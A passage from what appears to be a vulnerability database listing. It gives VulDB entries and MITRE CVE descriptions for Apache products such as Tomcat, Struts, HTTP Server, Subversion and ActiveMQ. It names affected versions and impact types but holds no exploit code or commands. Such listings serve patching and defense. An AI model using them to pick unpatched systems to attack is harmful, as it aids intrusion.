8475| [59934] Apache Tomcat up to 6.0.9 DigestAuthenticator.java unknown vulnerability
8476| [59933] Apache Tomcat up to 6.0.9 Access Restriction unknown vulnerability
8477| [59932] Apache Tomcat up to 6.0.9 unknown vulnerability
8478| [59931] Apache Tomcat up to 6.0.9 Access Restriction information disclosure
8479| [59902] Apache Struts up to 2.2.3 Interfaces unknown vulnerability
8480| [4528] Apache Struts up to 2.2.3 DebuggingInterceptor privilege escalation
8481| [4527] Apache Struts up to 2.2.3 ExceptionDelegator cross site scripting
8482| [59888] Apache Tomcat up to 6.0.6 denial of service
8483| [59886] Apache ActiveMQ up to 5.5.1 Crash denial of service
8484| [4513] Apache Struts up to 2.3.1 ParameterInterceptor directory traversal
8485| [4512] Apache Struts up to 2.2.3 CookieInterceptor privilege escalation
8486| [59850] Apache Geronimo up to 2.2.1 denial of service
8487| [59825] Apache HTTP Server up to 2.1.7 mod_reqtimeout denial of service
8488| [59556] Apache HTTP Server up to 2.0.53 mod_proxy information disclosure
8489| [58467] Apache libcloud 0.2.0/0.3.0/0.3.1/0.4.0 Access Restriction spoofing
8490| [58413] Apache Tomcat up to 6.0.10 spoofing
8491| [58381] Apache Wicket up to 1.4.17 cross site scripting
8492| [58296] Apache Tomcat up to 7.0.19 unknown vulnerability
8493| [57888] Apache HttpClient 4.0/4.0.1/4.1 Authorization information disclosure
8494| [57587] Apache Subversion up to 1.6.16 mod_dav_svn information disclosure
8495| [57585] Apache Subversion up to 1.6.16 mod_dav_svn Memory Consumption denial of service
8496| [57584] Apache Subversion up to 1.6.4 mod_dav_svn NULL Pointer Dereference denial of service
8497| [57577] Apache Rampart-C 1.3.0 Access Restriction rampart_timestamp_token_validate privilege escalation
8498| [57568] Apache Archiva up to 1.3.4 cross site scripting
8499| [57567] Apache Archiva up to 1.3.4 cross site request forgery
8500| [57481] Apache Tomcat 7.0.12/7.0.13 Access Restriction unknown vulnerability
8501| [4355] Apache HTTP Server APR apr_fnmatch denial of service
8502| [57435] Apache Struts up to 2.2.1.1 FileHandler.java cross site scripting
8503| [57425] Apache Struts up to 2.2.1.1 cross site scripting
8504| [4352] Apache HTTP Server 2.2.x APR apr_fnmatch denial of service
8505| [57025] Apache Tomcat up to 7.0.11 information disclosure
8506| [57024] Apache Tomcat 7.0.11 Access Restriction information disclosure
8507| [56774] IBM WebSphere Application Server up to 7.0.0.14 org.apache.jasper.runtime.JspWriterImpl.response denial of service
8508| [56824] Apache Subversion up to 1.6.4 mod_dav_svn NULL Pointer Dereference denial of service
8509| [56832] Apache Tomcat up to 7.0.10 Access Restriction information disclosure
8510| [56830] Apache Tomcat up to 7.0.9 Access Restriction privilege escalation
8511| [12440] Apache Tomcat 6.0.33 Malicious Request cross site scripting
8512| [56512] Apache Continuum up to 1.4.0 cross site scripting
8513| [4285] Apache Tomcat 5.x JVM getLocale denial of service
8514| [4284] Apache Tomcat 5.x HTML Manager Infinite Loop cross site scripting
8515| [4283] Apache Tomcat 5.x ServletContect privilege escalation
8516| [56441] Apache Tomcat up to 7.0.6 denial of service
8517| [56300] Apache CouchDB up to 1.0.1 Web Administration Interface cross site scripting
8518| [55967] Apache Subversion up to 1.6.4 rev_hunt.c denial of service
8519| [55966] Apache Subversion up to 1.6.4 mod_dav_svn repos.c walk denial of service
8520| [55095] Apache Axis2 up to 1.6 Default Password memory corruption
8521| [55631] Apache Archiva up to 1.3.1 User Account cross site request forgery
8522| [55556] Apache Tomcat up to 6.0.29 Default Configuration information disclosure
8523| [55553] Apache Tomcat up to 7.0.4 sessionsList.jsp cross site scripting
8524| [55162] Apache MyFaces up to 2.0.0 Authentication Code unknown vulnerability
8525| [54881] Apache Subversion up to 1.6.12 mod_dav_svn authz.c privilege escalation
8526| [54879] Apache APR-util up to 0.9.14 mod_reqtimeout apr_brigade_split_line denial of service
8527| [54693] Apache Traffic Server DNS Cache unknown vulnerability
8528| [54416] Apache CouchDB up to 0.11.0 cross site request forgery
8529| [54394] Apache CXF up to 2.2.8 Memory Consumption denial of service
8530| [54261] Apache Tomcat jsp/cal/cal2.jsp cross site scripting
8531| [54166] Apache HTTP Server up to 2.2.12 mod_cache Crash denial of service
8532| [54385] Apache Struts up to 2.1.8.1 ParameterInterceptor unknown vulnerability
8533| [54012] Apache Tomcat up to 6.0.10 denial of service
8534| [53763] Apache Axis2 1.3/1.4/1.4.1/1.5/1.5.1 Memory Consumption denial of service
8535| [53368] Apache MyFaces 1.1.7/1.2.8 cross site scripting
8536| [53397] Apache axis2 1.4.1/1.5.1 Administration Console cross site scripting
8537| [52894] Apache Tomcat up to 6.0.7 information disclosure
8538| [52960] Apache ActiveMQ up to 5.4-snapshot information disclosure
8539| [52843] Apache HTTP Server mod_auth_shadow unknown vulnerability
8540| [52786] Apache Open For Business Project up to 09.04 cross site scripting
8541| [52587] Apache ActiveMQ up to 5.3.0 cross site request forgery
8542| [52586] Apache ActiveMQ up to 5.3.0 cross site scripting
8543| [52584] Apache CouchDB up to 0.10.1 information disclosure
8544| [51757] Apache HTTP Server 2.0.44 cross site scripting
8545| [51756] Apache HTTP Server 2.0.44 spoofing
8546| [51717] Apache HTTP Server up to 1.3.3 mod_proxy ap_proxy_send_fb memory corruption
8547| [51690] Apache Tomcat up to 6.0 directory traversal
8548| [51689] Apache Tomcat up to 6.0 information disclosure
8549| [51688] Apache Tomcat up to 6.0 directory traversal
8550| [50886] HP Operations Manager 8.10 on Windows File Upload org.apache.catalina.manager.HTMLManagerServlet memory corruption
8551| [50802] Apache Tomcat up to 3.3 Default Password weak authentication
8552| [50626] Apache Solr 1.0.0 cross site scripting
8553| [49857] Apache HTTP Server mod_proxy_ftp cross site scripting
8554| [49856] Apache HTTP Server 2.2.13 mod_proxy_ftp ap_proxy_ftp_handler denial of service
8555| [49348] Apache Xerces-C++ 2.7.0 Stack-Based denial of service
8556| [86789] Apache Portable Runtime memory/unix/apr_pools.c unknown vulnerability
8557| [49283] Apache APR-util up to 1.3.8 apr-util misc/apr_rmm.c apr_rmm_realloc memory corruption
8558| [48952] Apache HTTP Server up to 1.3.6 mod_deflate denial of service
8559| [48626] Apache Tomcat up to 4.1.23 Access Restriction directory traversal
8560| [48431] Apache Tomcat up to 4.1.23 j_security_check cross site scripting
8561| [48430] Apache Tomcat up to 4.1.23 mod_jk denial of service
8562| [47801] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console cross site request forgery
8563| [47800] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console cross site scripting
8564| [47799] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console directory traversal
8565| [47648] Apache Tiles 2.1.0/2.1.1 cross site scripting
8566| [47640] Apache Struts 2.0.6/2.0.8/2.0.9/2.0.11/2.1 cross site scripting
8567| [47638] Apache Tomcat up to 4.1.23 mod_jk information disclosure
8568| [47636] Apache Struts 2.0.9 xip_client.html cross site scripting
8569| [47593] Apache Mod Perl 1 perl-status Apache::Status cross site scripting
8570| [47637] Apache Struts 1.0.2/1.1/1.2.4/1.2.7/1.2.8 cross site scripting
8571| [47239] Apache Struts up to 2.1.2 Beta struts directory traversal
8572| [47214] Apachefriends xampp 1.6.8 spoofing
8573| [47213] Apachefriends xampp 1.6.8 htaccess cross site request forgery
8574| [47162] Apachefriends XAMPP 1.4.4 weak authentication
8575| [47065] Apache Tomcat 4.1.23 cross site scripting
8576| [46834] Apache Tomcat up to 5.5.20 cross site scripting
8577| [46004] Apache Jackrabbit 1.4/1.5.0 search.jsp cross site scripting
8578| [49205] Apache Roller 2.3/3.0/3.1/4.0 Search cross site scripting
8579| [86625] Apache Struts directory traversal
8580| [44461] Apache Tomcat up to 5.5.0 information disclosure
8581| [44389] Apache Xerces-C++ XML Parser Memory Consumption denial of service
8582| [44352] Apache Friends XAMPP 1.6.8 adodb.php cross site scripting
8583| [43663] Apache Tomcat up to 6.0.16 directory traversal
8584| [43612] Apache Friends XAMPP 1.6.7 iart.php cross site scripting
8585| [43556] Apache HTTP Server up to 2.1.8 mod_proxy_ftp proxy_ftp.c cross site scripting
8586| [43516] Apache Tomcat up to 4.1.20 directory traversal
8587| [43509] Apache Tomcat up to 6.0.13 cross site scripting
8588| [42637] Apache Tomcat up to 6.0.16 cross site scripting
8589| [42325] Apache HTTP Server up to 2.1.8 Error Page cross site scripting
8590| [41838] Apache-SSL 1.3.34 1.57 expandcert privilege escalation
8591| [41091] Apache Software Foundation Mod Jk up to 2.0.1 mod_jk2 Stack-based memory corruption
8592| [40924] Apache Tomcat up to 6.0.15 information disclosure
8593| [40923] Apache Tomcat up to 6.0.15 unknown vulnerability
8594| [40922] Apache Tomcat up to 6.0 information disclosure
8595| [40710] Apache HTTP Server up to 2.0.61 mod_negotiation cross site scripting
8596| [40709] Apache HTTP Server up to 2.0.53 mod_negotiation cross site scripting
8597| [40656] Apache Tomcat 5.5.20 information disclosure
8598| [40503] Apache HTTP Server mod_proxy_ftp cross site scripting
8599| [40502] Apache HTTP Server up to 2.2.5 mod_proxy_balancer memory corruption
8600| [40501] Apache HTTP Server 2.2.6 mod_proxy_balancer cross site request forgery
8601| [40398] Apache HTTP Server up to 2.2 mod_proxy_balancer cross site scripting
8602| [40397] Apache HTTP Server up to 2.2 mod_proxy_balancer balancer_handler denial of service
8603| [40234] Apache Tomcat up to 6.0.15 directory traversal
8604| [40221] Apache HTTP Server 2.2.6 information disclosure
8605| [40027] David Castro Apache Authcas 0.4 sql injection
8606| [3495] Apache OpenOffice up to 2.3 Database Document Processor unknown vulnerability
8607| [3489] Apache HTTP Server 2.x HTTP Header cross site scripting
8608| [3414] Apache Tomcat WebDAV Stored privilege escalation
8609| [39489] Apache Jakarta Slide up to 2.1 directory traversal
8610| [39540] Apache Geronimo 2.0/2.0.1/2.0.2/2.1 unknown vulnerability
8611| [3310] Apache OpenOffice 1.1.3/2.0.4/2.2.1 TIFF Image Parser Heap-based memory corruption
8612| [38768] Apache HTTP Server up to 2.1.7 mod_autoindex.c cross site scripting
8613| [38952] Apache Geronimo 2.0.1/2.1 unknown vulnerability
8614| [38658] Apache Tomcat 4.1.31 cal2.jsp cross site request forgery
8615| [38524] Apache Geronimo 2.0 unknown vulnerability
8616| [3256] Apache Tomcat up to 6.0.13 cross site scripting
8617| [38331] Apache Tomcat 4.1.24 information disclosure
8618| [38330] Apache Tomcat 4.1.24 information disclosure
8619| [38185] Apache Tomcat 3.3/3.3.1/3.3.1a/3.3.2 Error Message CookieExample cross site scripting
8620| [37967] Apache Tomcat up to 4.1.36 Error Message sendmail.jsp cross site scripting
8621| [37647] Apache Derby 10.1.1.0/10.1.2.1/10.1.3.1 Authorization unknown vulnerability
8622| [37646] Apache Derby 10.1.1.0/10.1.2.1/10.1.3.1 unknown vulnerability
8623| [3141] Apache Tomcat up to 4.1.31 Accept-Language Header cross site scripting
8624| [3133] Apache Tomcat up to 6.0 HTTP cross site scripting
8625| [37292] Apache Tomcat up to 5.5.1 cross site scripting
8626| [3130] Apache OpenOffice 2.2.1 RTF Document Heap-based memory corruption
8627| [36981] Apache Tomcat JK Web Server Connector up to 1.2.22 mod_jk directory traversal
8628| [36892] Apache Tomcat up to 4.0.0 hello.jsp cross site scripting
8629| [37320] Apache MyFaces Tomahawk up to 1.1.4 cross site scripting
8630| [36697] Apache Tomcat up to 5.5.17 implicit-objects.jsp cross site scripting
8631| [36491] Apache Axis 1.0 Installation javaioFileNotFoundException information disclosure
8632| [36400] Apache Tomcat 5.5.15 mod_jk cross site scripting
8633| [36698] Apache Tomcat up to 4.0.0 cal2.jsp cross site scripting
8634| [36224] XAMPP Apache Distribution up to 1.6.0a adodb.php connect memory corruption
8635| [36225] XAMPP Apache Distribution 1.6.0a sql injection
8636| [2997] Apache httpd/Tomcat 5.5/6.0 directory traversal
8637| [35896] Apache Apache Test up to 1.29 mod_perl denial of service
8638| [35653] Avaya S8300 Cm 3.1.2 Apache Tomcat unknown vulnerability
8639| [35402] Apache Tomcat JK Web Server Connector 1.2.19 mod_jk.so map_uri_to_worker memory corruption
8640| [35067] Apache Stats up to 0.0.2 extract unknown vulnerability
8641| [35025] Apache Stats up to 0.0.3 extract unknown vulnerability
8642| [34252] Apache HTTP Server denial of service
8643| [2795] Apache OpenOffice 2.0.4 WMF/EMF File Heap-based memory corruption
8644| [33877] Apache Opentaps 0.9.3 cross site scripting
8645| [33876] Apache Open For Business Project unknown vulnerability
8646| [33875] Apache Open For Business Project cross site scripting
8647| [2703] Apache Jakarta Tomcat up to 5.x der_get_oid memory corruption
8648| [2611] Apache HTTP Server up to 1.0.1 set_var Format String
8649|
8650| MITRE CVE - https://cve.mitre.org:
8651| [CVE-2013-4156] Apache OpenOffice.org (OOo) before 4.0 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via a crafted element in an OOXML document file.
8652| [CVE-2013-4131] The mod_dav_svn Apache HTTPD server module in Subversion 1.7.0 through 1.7.10 and 1.8.x before 1.8.1 allows remote authenticated users to cause a denial of service (assertion failure or out-of-bounds read) via a certain (1) COPY, (2) DELETE, or (3) MOVE request against a revision root.
8653| [CVE-2013-3239] phpMyAdmin 3.5.x before 3.5.8 and 4.x before 4.0.0-rc3, when a SaveDir directory is configured, allows remote authenticated users to execute arbitrary code by using a double extension in the filename of an export file, leading to interpretation of this file as an executable file by the Apache HTTP Server, as demonstrated by a .php.sql filename.
8654| [CVE-2013-3060] The web console in Apache ActiveMQ before 5.8.0 does not require authentication, which allows remote attackers to obtain sensitive information or cause a denial of service via HTTP requests.
8655| [CVE-2013-2765] The ModSecurity module before 2.7.4 for the Apache HTTP Server allows remote attackers to cause a denial of service (NULL pointer dereference, process crash, and disk consumption) via a POST request with a large body and a crafted Content-Type header.
8656| [CVE-2013-2251] Apache Struts 2.0.0 through 2.3.15 allows remote attackers to execute arbitrary OGNL expressions via a parameter with a crafted (1) action:, (2) redirect:, or (3) redirectAction: prefix.
8657| [CVE-2013-2249] mod_session_dbd.c in the mod_session_dbd module in the Apache HTTP Server before 2.4.5 proceeds with save operations for a session without considering the dirty flag and the requirement for a new session ID, which has unspecified impact and remote attack vectors.
8658| [CVE-2013-2248] Multiple open redirect vulnerabilities in Apache Struts 2.0.0 through 2.3.15 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in a parameter using the (1) redirect: or (2) redirectAction: prefix.
8659| [CVE-2013-2189] Apache OpenOffice.org (OOo) before 4.0 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via invalid PLCF data in a DOC document file.
8660| [CVE-2013-2135] Apache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted value that contains both "${}" and "%{}" sequences, which causes the OGNL code to be evaluated twice.
8661| [CVE-2013-2134] Apache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted action name that is not properly handled during wildcard matching, a different vulnerability than CVE-2013-2135.
8662| [CVE-2013-2115] Apache Struts 2 before 2.3.14.2 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag. NOTE: this issue is due to an incomplete fix for CVE-2013-1966.
8663| [CVE-2013-2071] java/org/apache/catalina/core/AsyncContextImpl.java in Apache Tomcat 7.x before 7.0.40 does not properly handle the throwing of a RuntimeException in an AsyncListener in an application, which allows context-dependent attackers to obtain sensitive request information intended for other applications in opportunistic circumstances via an application that records the requests that it processes.
8664| [CVE-2013-2067] java/org/apache/catalina/authenticator/FormAuthenticator.java in the form authentication feature in Apache Tomcat 6.0.21 through 6.0.36 and 7.x before 7.0.33 does not properly handle the relationships between authentication requirements and sessions, which allows remote attackers to inject a request into a session by sending this request during completion of the login form, a variant of a session fixation attack.
8665| [CVE-2013-1966] Apache Struts 2 before 2.3.14.1 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag.
8666| [CVE-2013-1965] Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.1, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect.
8667| [CVE-2013-1896] mod_dav.c in the Apache HTTP Server before 2.2.25 does not properly determine whether DAV is enabled for a URI, which allows remote attackers to cause a denial of service (segmentation fault) via a MERGE request in which the URI is configured for handling by the mod_dav_svn module, but a certain href attribute in XML data refers to a non-DAV URI.
8668| [CVE-2013-1884] The mod_dav_svn Apache HTTPD server module in Subversion 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (segmentation fault and crash) via a log REPORT request with an invalid limit, which triggers an access of an uninitialized variable.
8669| [CVE-2013-1879] Cross-site scripting (XSS) vulnerability in scheduled.jsp in Apache ActiveMQ 5.8.0 and earlier allows remote attackers to inject arbitrary web script or HTML via vectors involving the "cron of a message."
8670| [CVE-2013-1862] mod_rewrite.c in the mod_rewrite module in the Apache HTTP Server 2.2.x before 2.2.25 writes data to a log file without sanitizing non-printable characters, which might allow remote attackers to execute arbitrary commands via an HTTP request containing an escape sequence for a terminal emulator.
8671| [CVE-2013-1849] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x through 1.6.20 and 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via a PROPFIND request for an activity URL.
8672| [CVE-2013-1847] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.0 through 1.6.20 and 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via an anonymous LOCK for a URL that does not exist.
8673| [CVE-2013-1846] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x before 1.6.21 and 1.7.0 through 1.7.8 allows remote authenticated users to cause a denial of service (NULL pointer dereference and crash) via a LOCK on an activity URL.
8674| [CVE-2013-1845] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x before 1.6.21 and 1.7.0 through 1.7.8 allows remote authenticated users to cause a denial of service (memory consumption) by (1) setting or (2) deleting a large number of properties for a file or directory.
8675| [CVE-2013-1814] The users/get program in the User RPC API in Apache Rave 0.11 through 0.20 allows remote authenticated users to obtain sensitive information about all user accounts via the offset parameter, as demonstrated by discovering password hashes in the password field of a response.
8676| [CVE-2013-1777] The JMX Remoting functionality in Apache Geronimo 3.x before 3.0.1, as used in IBM WebSphere Application Server (WAS) Community Edition 3.0.0.3 and other products, does not property implement the RMI classloader, which allows remote attackers to execute arbitrary code by using the JMX connector to send a crafted serialized object.
8677| [CVE-2013-1768] The BrokerFactory functionality in Apache OpenJPA 1.x before 1.2.3 and 2.x before 2.2.2 creates local executable JSP files containing logging trace data produced during deserialization of certain crafted OpenJPA objects, which makes it easier for remote attackers to execute arbitrary code by creating a serialized object and leveraging improperly secured server programs.
8678| [CVE-2013-1088] Cross-site request forgery (CSRF) vulnerability in Novell iManager 2.7 before SP6 Patch 1 allows remote attackers to hijack the authentication of arbitrary users by leveraging improper request validation by iManager code deployed within an Apache Tomcat container.
8679| [CVE-2013-1048] The Debian apache2ctl script in the apache2 package squeeze before 2.2.16-6+squeeze11, wheezy before 2.2.22-13, and sid before 2.2.22-13 for the Apache HTTP Server on Debian GNU/Linux does not properly create the /var/lock/apache2 lock directory, which allows local users to gain privileges via an unspecified symlink attack.
8680| [CVE-2013-0966] The Apple mod_hfs_apple module for the Apache HTTP Server in Apple Mac OS X before 10.8.3 does not properly handle ignorable Unicode characters, which allows remote attackers to bypass intended directory authentication requirements via a crafted pathname in a URI.
8681| [CVE-2013-0942] Cross-site scripting (XSS) vulnerability in EMC RSA Authentication Agent 7.1 before 7.1.1 for Web for Internet Information Services, and 7.1 before 7.1.1 for Web for Apache, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
8682| [CVE-2013-0941] EMC RSA Authentication API before 8.1 SP1, RSA Web Agent before 5.3.5 for Apache Web Server, RSA Web Agent before 5.3.5 for IIS, RSA PAM Agent before 7.0, and RSA Agent before 6.1.4 for Microsoft Windows use an improper encryption algorithm and a weak key for maintaining the stored data of the node secret for the SecurID Authentication API, which allows local users to obtain sensitive information via cryptographic attacks on this data.
8683| [CVE-2013-0253] The default configuration of Apache Maven 3.0.4, when using Maven Wagon 2.1, disables SSL certificate checks, which allows remote attackers to spoof servers via a man-in-the-middle (MITM) attack.
8684| [CVE-2013-0248] The default configuration of javax.servlet.context.tempdir in Apache Commons FileUpload 1.0 through 1.2.2 uses the /tmp directory for uploaded files, which allows local users to overwrite arbitrary files via an unspecified symlink attack.
8685| [CVE-2013-0239] Apache CXF before 2.5.9, 2.6.x before 2.6.6, and 2.7.x before 2.7.3, when the plaintext UsernameToken WS-SecurityPolicy is enabled, allows remote attackers to bypass authentication via a security header of a SOAP request containing a UsernameToken element that lacks a password child element.
8686| [CVE-2012-6573] Cross-site scripting (XSS) vulnerability in the Apache Solr Autocomplete module 6.x-1.x before 6.x-1.4 and 7.x-1.x before 7.x-1.3 for Drupal allows remote attackers to inject arbitrary web script or HTML via vectors involving autocomplete results.
8687| [CVE-2012-6551] The default configuration of Apache ActiveMQ before 5.8.0 enables a sample web application, which allows remote attackers to cause a denial of service (broker resource consumption) via HTTP requests.
8688| [CVE-2012-6092] Multiple cross-site scripting (XSS) vulnerabilities in the web demos in Apache ActiveMQ before 5.8.0 allow remote attackers to inject arbitrary web script or HTML via (1) the refresh parameter to PortfolioPublishServlet.java (aka demo/portfolioPublish or Market Data Publisher), or vectors involving (2) debug logs or (3) subscribe messages in webapp/websocket/chat.js. NOTE: AMQ-4124 is covered by CVE-2012-6551.
8689| [CVE-2012-5887] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 does not properly check for stale nonce values in conjunction with enforcement of proper credentials, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests.
8690| [CVE-2012-5886] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 caches information about the authenticated user within the session state, which makes it easier for remote attackers to bypass authentication via vectors related to the session ID.
8691| [CVE-2012-5885] The replay-countermeasure functionality in the HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 tracks cnonce (aka client nonce) values instead of nonce (aka server nonce) and nc (aka nonce-count) values, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests, a different vulnerability than CVE-2011-1184.
8692| [CVE-2012-5786] The wsdl_first_https sample code in distribution/src/main/release/samples/wsdl_first_https/src/main/ in Apache CXF, possibly 2.6.0, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
8693| [CVE-2012-5785] Apache Axis2/Java 1.6.2 and earlier does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
8694| [CVE-2012-5784] Apache Axis 1.4 and earlier, as used in PayPal Payments Pro, PayPal Mass Pay, PayPal Transactional Information SOAP, the Java Message Service implementation in Apache ActiveMQ, and other products, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
8695| [CVE-2012-5783] Apache Commons HttpClient 3.x, as used in Amazon Flexible Payments Service (FPS) merchant Java SDK and other products, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
8696| [CVE-2012-5633] The URIMappingInterceptor in Apache CXF before 2.5.8, 2.6.x before 2.6.5, and 2.7.x before 2.7.2, when using the WSS4JInInterceptor, bypasses WS-Security processing, which allows remote attackers to obtain access to SOAP services via an HTTP GET request.
8697| [CVE-2012-5616] Apache CloudStack 4.0.0-incubating and Citrix CloudPlatform (formerly Citrix CloudStack) before 3.0.6 stores sensitive information in the log4j.conf log file, which allows local users to obtain (1) the SSH private key as recorded by the createSSHKeyPair API, (2) the password of an added host as recorded by the AddHost API, or the password of an added VM as recorded by the (3) DeployVM or (4) ResetPasswordForVM API.
8698| [CVE-2012-5568] Apache Tomcat through 7.0.x allows remote attackers to cause a denial of service (daemon outage) via partial HTTP requests, as demonstrated by Slowloris.
8699| [CVE-2012-5351] Apache Axis2 allows remote attackers to forge messages and bypass authentication via a SAML assertion that lacks a Signature element, aka a "Signature exclusion attack," a different vulnerability than CVE-2012-4418.
8700| [CVE-2012-4558] Multiple cross-site scripting (XSS) vulnerabilities in the balancer_handler function in the manager interface in mod_proxy_balancer.c in the mod_proxy_balancer module in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via a crafted string.
8701| [CVE-2012-4557] The mod_proxy_ajp module in the Apache HTTP Server 2.2.12 through 2.2.21 places a worker node into an error state upon detection of a long request-processing time, which allows remote attackers to cause a denial of service (worker consumption) via an expensive request.
8702| [CVE-2012-4556] The token processing system (pki-tps) in Red Hat Certificate System (RHCS) before 8.1.3 allows remote attackers to cause a denial of service (Apache httpd web server child process restart) via certain unspecified empty search fields in a user certificate search query.
8703| [CVE-2012-4555] The token processing system (pki-tps) in Red Hat Certificate System (RHCS) before 8.1.3 does not properly handle interruptions of token format operations, which allows remote attackers to cause a denial of service (NULL pointer dereference and Apache httpd web server child process crash) via unspecified vectors.
8704| [CVE-2012-4534] org/apache/tomcat/util/net/NioEndpoint.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.28, when the NIO connector is used in conjunction with sendfile and HTTPS, allows remote attackers to cause a denial of service (infinite loop) by terminating the connection during the reading of a response.
8705| [CVE-2012-4528] The mod_security2 module before 2.7.0 for the Apache HTTP Server allows remote attackers to bypass rules, and deliver arbitrary POST data to a PHP application, via a multipart request in which an invalid part precedes the crafted data.
8706| [CVE-2012-4501] Citrix Cloud.com CloudStack, and Apache CloudStack pre-release, allows remote attackers to make arbitrary API calls by leveraging the system user account, as demonstrated by API calls to delete VMs.
8707| [CVE-2012-4460] The serializing/deserializing functions in the qpid::framing::Buffer class in Apache Qpid 0.20 and earlier allow remote attackers to cause a denial of service (assertion failure and daemon exit) via unspecified vectors. NOTE: this issue could also trigger an out-of-bounds read, but it might not trigger a crash.
8708| [CVE-2012-4459] Integer overflow in the qpid::framing::Buffer::checkAvailable function in Apache Qpid 0.20 and earlier allows remote attackers to cause a denial of service (crash) via a crafted message, which triggers an out-of-bounds read.
8709| [CVE-2012-4458] The AMQP type decoder in Apache Qpid 0.20 and earlier allows remote attackers to cause a denial of service (memory consumption and server crash) via a large number of zero width elements in the client-properties map in a connection.start-ok message.
8710| [CVE-2012-4446] The default configuration for Apache Qpid 0.20 and earlier, when the federation_tag attribute is enabled, accepts AMQP connections without checking the source user ID, which allows remote attackers to bypass authentication and have other unspecified impact via an AMQP request.
8711| [CVE-2012-4431] org/apache/catalina/filters/CsrfPreventionFilter.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.32 allows remote attackers to bypass the cross-site request forgery (CSRF) protection mechanism via a request that lacks a session identifier.
8712| [CVE-2012-4418] Apache Axis2 allows remote attackers to forge messages and bypass authentication via an "XML Signature wrapping attack."
8713| [CVE-2012-4387] Apache Struts 2.0.0 through 2.3.4 allows remote attackers to cause a denial of service (CPU consumption) via a long parameter name, which is processed as an OGNL expression.
8714| [CVE-2012-4386] The token check mechanism in Apache Struts 2.0.0 through 2.3.4 does not properly validate the token name configuration parameter, which allows remote attackers to perform cross-site request forgery (CSRF) attacks by setting the token name configuration parameter to a session attribute.
8715| [CVE-2012-4360] Cross-site scripting (XSS) vulnerability in the mod_pagespeed module 0.10.19.1 through 0.10.22.4 for the Apache HTTP Server allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
8716| [CVE-2012-4063] The Apache Santuario configuration in Eucalyptus before 3.1.1 does not properly restrict applying XML Signature transforms to documents, which allows remote attackers to cause a denial of service via unspecified vectors.
8717| [CVE-2012-4001] The mod_pagespeed module before 0.10.22.6 for the Apache HTTP Server does not properly verify its host name, which allows remote attackers to trigger HTTP requests to arbitrary hosts via unspecified vectors, as demonstrated by requests to intranet servers.
8718| [CVE-2012-3908] Multiple cross-site request forgery (CSRF) vulnerabilities in the ISE Administrator user interface (aka the Apache Tomcat interface) on Cisco Identity Services Engine (ISE) 3300 series appliances before 1.1.0.665 Cumulative Patch 1 allow remote attackers to hijack the authentication of administrators, aka Bug ID CSCty46684.
8719| [CVE-2012-3546] org/apache/catalina/realm/RealmBase.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.30, when FORM authentication is used, allows remote attackers to bypass security-constraint checks by leveraging a previous setUserPrincipal call and then placing /j_security_check at the end of a URI.
8720| [CVE-2012-3544] Apache Tomcat 6.x before 6.0.37 and 7.x before 7.0.30 does not properly handle chunk extensions in chunked transfer coding, which allows remote attackers to cause a denial of service by streaming data.
8721| [CVE-2012-3526] The reverse proxy add forward module (mod_rpaf) 0.5 and 0.6 for the Apache HTTP Server allows remote attackers to cause a denial of service (server or application crash) via multiple X-Forwarded-For headers in a request.
8722| [CVE-2012-3513] munin-cgi-graph in Munin before 2.0.6, when running as a CGI module under Apache, allows remote attackers to load new configurations and create files in arbitrary directories via the logdir command.
8723| [CVE-2012-3506] Unspecified vulnerability in the Apache Open For Business Project (aka OFBiz) 10.04.x before 10.04.03 has unknown impact and attack vectors.
